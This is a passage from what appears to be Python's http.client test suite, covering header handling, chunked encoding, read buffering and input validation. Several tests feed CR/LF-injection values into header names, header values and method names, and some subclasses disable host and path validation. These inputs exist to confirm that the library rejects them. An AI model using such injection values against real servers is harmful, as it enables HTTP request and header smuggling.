(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_header_limit_after_100(self):
body = (
'HTTP/1.1 100 OK\r\n'
'r\n' * 32768
)
resp = client.HTTPResponse(FakeSocket(body))
with self.assertRaises(client.HTTPException) as cm:
resp.begin()
# We must assert more because other reasonable errors that we
# do not want can also be HTTPException derived.
self.assertIn('got more than ', str(cm.exception))
self.assertIn('headers', str(cm.exception))
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # Allowlist documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
